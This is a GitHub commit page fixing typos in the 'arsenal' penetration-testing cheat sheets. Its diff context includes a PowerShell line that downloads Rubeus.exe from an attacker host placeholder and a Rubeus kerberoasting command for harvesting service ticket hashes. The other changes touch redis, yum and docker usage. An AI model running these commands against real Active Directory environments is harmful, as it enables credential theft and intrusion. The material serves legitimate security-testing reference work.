Skip to content

Commit

Permalink
fix typos
Browse files Browse the repository at this point in the history
  • Loading branch information
Mayfly277 committed Mar 20, 2024
1 parent cf28352 commit bb6d7d4
Show file tree
Hide file tree
Showing 5 changed files with 9 additions and 9 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -76,7 +76,7 @@ yay -S arsenal

```
./run -t # if you launch arsenal in a tmux window with one pane, it will split the window and send the command to the otherpane without quitting arsenal
# if the window is already splited the command will be send to the other pane without quitting arsenal
# if the window is already split the command will be send to the other pane without quitting arsenal
./run -t -e # just like the -t mode but with direct execution in the other pane without quitting arsenal
```

Expand Down
2 changes: 1 addition & 1 deletion arsenal/data/cheats/Active_directory/rubeus.md
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,7 @@ $data = (New-Object System.Net.WebClient).DownloadData('http://<lhost>/Rubeus.ex
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
```

## Kerberoasting and outputting on a file with a spesific format
## Kerberoasting and outputting on a file with a specific format
#plateform/windows #target/remote #cat/ATTACK/EXPLOIT
```cmd
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name>
Expand Down
6 changes: 3 additions & 3 deletions arsenal/data/cheats/Databases/redis.md
Original file line number Diff line number Diff line change
Expand Up @@ -13,17 +13,17 @@ redis-cli
redis-cli -h <ip> -a <password>
```

## connect remotly specifying a port
## connect remotely specifying a port
```bash
redis-cli -h <ip> -p <port> -a <password>
```

## connect remotly over tls w/ server certificate
## connect remotely over tls w/ server certificate
```bash
redis-cli -h <ip> --tls --cacert <redis_cert_path.pem>
```

## connect remotly over tls w/ server & client certificates
## connect remotely over tls w/ server & client certificates
```bash
redis-cli -h <ip> --tls --cacert <redis_cert_path.pem> --cert <redis_user_path.crt> --key <redis_user_private_path.key>
```
4 changes: 2 additions & 2 deletions arsenal/data/cheats/Install/yum.md
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@ yum check-update
yum update
```

## Update spesific/individual package
## Update specific/individual package
```
yum update <package-name>
```
Expand Down Expand Up @@ -86,4 +86,4 @@ yum whatprovides <query>
## List currently enabled repositories
```
yum repolist
```
```
4 changes: 2 additions & 2 deletions arsenal/data/cheats/Tools/docker.md
Original file line number Diff line number Diff line change
Expand Up @@ -56,13 +56,13 @@ $ container_id: docker ps --- --headers 1 --column 1
# Builds, (re)creates, starts, and attaches to containers for all services
docker-compose up

# Builds, (re)creates, starts, and dettaches to containers for all services
# Builds, (re)creates, starts, and detaches to containers for all services
docker-compose up -d

# Builds, (re)creates, starts, and attaches to containers for a service
docker-compose up -d <service_name>

# Builds, (re)creates, starts, and dettaches to containers for a service
# Builds, (re)creates, starts, and detaches to containers for a service
docker-compose up -d <service_name>

# Print the last lines of a service’s logs
Expand Down

0 comments on commit bb6d7d4

Please sign in to comment.